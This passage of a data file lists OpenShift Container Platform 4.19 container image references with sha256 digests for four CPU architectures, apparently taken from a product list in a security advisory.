"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
